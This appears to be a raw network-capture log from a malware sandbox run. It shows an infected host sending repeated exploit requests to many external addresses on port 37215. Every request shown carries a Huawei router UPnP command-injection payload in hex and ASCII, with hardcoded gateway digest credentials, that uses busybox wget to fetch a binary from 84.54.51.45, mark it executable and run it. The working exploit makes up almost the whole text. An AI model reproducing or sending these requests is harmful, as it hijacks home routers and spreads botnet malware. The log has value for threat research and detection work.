                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2392192.168.2.153818041.108.215.23837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810249090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2393192.168.2.153826241.126.195.237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810251951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2394192.168.2.154866441.76.251.12537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810282946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2395192.168.2.153460241.15.144.13837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810307026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2396192.168.2.154774241.169.130.19637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810340881 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2397192.168.2.154061841.186.100.13137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810358047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2398192.168.2.155744841.17.248.6937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810410023 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2399192.168.2.155295241.192.49.23437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810441017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2400192.168.2.154494041.114.219.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810472965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2401192.168.2.155151241.200.91.13437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810472965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 